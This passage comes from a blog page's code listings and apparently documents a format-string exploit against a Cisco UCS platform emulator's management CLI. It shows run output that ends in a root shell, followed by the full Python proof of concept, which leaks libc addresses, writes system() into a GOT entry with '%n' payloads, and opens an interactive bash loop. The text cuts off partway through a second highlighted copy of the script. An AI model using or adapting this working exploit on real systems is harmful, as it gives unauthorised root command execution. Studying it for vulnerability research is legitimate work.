class=\"crayon-v\">address<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">libc <\/span><span class=\"crayon-e\">base <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7746000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">system <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7780f60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sending <\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-15\"><span class=\"crayon-e\">show <\/span><span class=\"crayon-v\">sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">62c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-e\">nAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-16\"><span class=\"crayon-e\">show <\/span><span class=\"crayon-v\">sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">237c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-e\">nAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-17\"><span class=\"crayon-e\">show <\/span><span class=\"crayon-v\">sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">86c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-e\">nAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-18\"><span class=\"crayon-e\">show <\/span><span class=\"crayon-v\">sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">229c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-e\">nAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-19\"><span class=\"crayon-e\">Sleep <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fork <\/span><span class=\"crayon-v\">adjustment<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-20\"><span class=\"crayon-e\">Ok <\/span><span class=\"crayon-e\">please <\/span><span class=\"crayon-e\">type <\/span><span class=\"crayon-e\">your <\/span><span class=\"crayon-e\">commands<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">type <\/span><span class=\"crayon-e\">exit <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exit<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-21\"><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">id<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;uid=0(root) gid=0(root) groups=0(root)&#8217;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-23\"><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0027 seconds] -->  <\/p>\n<p><strong>poc4_ucspe_3.1.2e.py<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4e6698506105\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import struct  import time  import binascii    def generate_payload(addr):      basepayload = &#8220;show sel AAAAAAAAAAAA&#8221;      aa = (addr &gt;&gt; 24 &amp; 0xff)      bb = (addr &gt;&gt; 16 &amp; 0xff)      cc = (addr &gt;&gt; 8 &amp; 0xff)      dd = (addr &gt;&gt; 0 &amp; 0xff)      if aa&lt;34:          aa_c_payload = aa + 222      else:          aa_c_payload = aa &#8211; 34      if bb&lt;34:          bb_c_payload = bb + 222      else:          bb_c_payload = bb &#8211; 34      if cc&lt;34:          cc_c_payload = cc + 222      else:          cc_c_payload = cc &#8211; 34      if dd&lt;34:          dd_c_payload = dd + 222      else:          dd_c_payload = dd &#8211; 34      aa_payload = &#8220;%&#8221; + str(aa_c_payload) + &#8220;c%28$n&#8221;      bb_payload = &#8220;%&#8221; + str(bb_c_payload) + &#8220;c%28$n&#8221;      cc_payload = &#8220;%&#8221; + str(cc_c_payload) + &#8220;c%28$n&#8221;      dd_payload = &#8220;%&#8221; + str(dd_c_payload) + &#8220;c%28$n&#8221;      aap = basepayload[:9] + aa_payload + basepayload[len(aa_payload)+9:]      bbp = basepayload[:9] + bb_payload + basepayload[len(bb_payload)+9:]      ccp = basepayload[:9] + cc_payload + basepayload[len(cc_payload)+9:]      ddp = basepayload[:9] + dd_payload + basepayload[len(dd_payload)+9:]      return [aap,bbp,ccp,ddp]    def clearlog():      fo = open(&#8220;output\/log&#8221;,&#8221;w&#8221;)      fo.truncate()      fo.close()    def readlog():      logread = [line.strip(&#8216;n\u0000x00&#8217;) for line in open(&#8216;output\/log&#8217;)]      return logread    def sendcommand(cmd):      f=open(&#8220;fifo1&#8221;, &#8220;a+&#8221;)      f.write(cmd+&#8221;n&#8221;)      f.close()    def dump(adr, frmt=&#8217;p&#8217;):      clearlog()      leak_part = &#8220;show sel %28${}&#8221;.format(frmt)      raw_addr = struct.pack(&#8220;I&#8221;, adr)      if &#8220;x20&#8221; in raw_addr:          print &#8220;space!&#8221;      out = leak_part + &#8220;AAAAAAA&#8221;+raw_addr      sendcommand(out)      time.sleep(2)      e = readlog()[0]      outbin =  e.split(&#8220;AAAAAAA&#8221;)[0].split(&#8220;: &#8220;)[2]      clearlog()      return outbin+&#8221;x00&#8221;    def starting_point():      clearlog()      out = &#8220;show sel %147$x&#8221;      sendcommand(out)      time.sleep(2)      e = readlog()[0]      outbin =  e.split(&#8220;AAAAAAA&#8221;)[0].split(&#8220;:&#8221;)[2]      clearlog()      return outbin      clidcos_step = 0x1DB0C  libc_emulator_snprintf = 0x0004b210  libc_emulator_system = 0x0003af60    print &#8220;Going through some menus please wait a moment..&#8221;  sendcommand(&#8220;c&#8221;)  time.sleep(1)  sendcommand(&#8220;show version&#8221;)  time.sleep(1)  sendcommand(&#8220;connect local-mgmt&#8221;)  time.sleep(1)  sendcommand(&#8220;connect local-mgmt&#8221;)  time.sleep(1)  sendcommand(&#8220;show version&#8221;)  time.sleep(5)  clearlog()    print &#8220;You should now see on the other terminal message simmilar to &#8220;Error: Already in local-mgmt shell..&#8221; &#8221;  print &#8220;[.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&amp;) addres from libsamvsh.so&#8221;  off3 = int(starting_point(),16)  print &#8221;    -&gt; &#8221; + hex(off3)  print &#8220;[.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt&#8221;  clidcosGOTPLT = off3+clidcos_step  print &#8221;    -&gt; &#8221; + hex(clidcosGOTPLT)  print &#8220;[.] Dumping snprintf address from libc&#8221;  libc_printf = dump(clidcosGOTPLT+8,&#8217;s&#8217;)[:4]  libc_tmp1_hex = binascii.hexlify(libc_printf[::-1])  libc_snprintf_addr =  int(libc_tmp1_hex, 16)  print &#8221;    -&gt; &#8221; + hex(libc_snprintf_addr)  print &#8220;[.] Calculating libc system address&#8221;  libc_base_addr = libc_snprintf_addr &#8211; libc_emulator_snprintf  print &#8221;    -&gt; libc base addr = &#8221; + hex(libc_base_addr)  libc_system_addr = libc_base_addr + libc_emulator_system  print &#8221;    -&gt; system addr = &#8221; + hex(libc_system_addr)  print &#8220;n[.] Sending payload..&#8221;    sendcommand(generate_payload(libc_system_addr)[3] + struct.pack(&#8220;I&#8221;, clidcosGOTPLT))  print generate_payload(libc_system_addr)[3]  sendcommand(&#8220;show version&#8221;)  time.sleep(1)    sendcommand(generate_payload(libc_system_addr)[2] + struct.pack(&#8220;I&#8221;, clidcosGOTPLT+1))  print generate_payload(libc_system_addr)[2]  sendcommand(&#8220;show version&#8221;)  time.sleep(1)    sendcommand(generate_payload(libc_system_addr)[1] + struct.pack(&#8220;I&#8221;, clidcosGOTPLT+2))  print generate_payload(libc_system_addr)[1]  sendcommand(&#8220;show version&#8221;)  time.sleep(1)    sendcommand(generate_payload(libc_system_addr)[0] + struct.pack(&#8220;I&#8221;, clidcosGOTPLT+3))  print generate_payload(libc_system_addr)[0]  sendcommand(&#8220;show version&#8221;)  time.sleep(1)    print &#8220;Sleep for fork adjustment..&#8221;  time.sleep(5)  sendcommand(&#8220;ssh \/bin\/bash&#8221;)  print &#8220;Ok please type your commands (type exit for exit)&#8221;  time.sleep(2)  while True:      n = raw_input(&#8220;&gt; &#8220;)      if &#8216;exit&#8217; in n:          break      clearlog()      sendcommand(n)      time.sleep(2)      print readlog()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e6698506105-144\">144<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">time<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">binascii<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-5\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;show sel AAAAAAAAAAAA&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 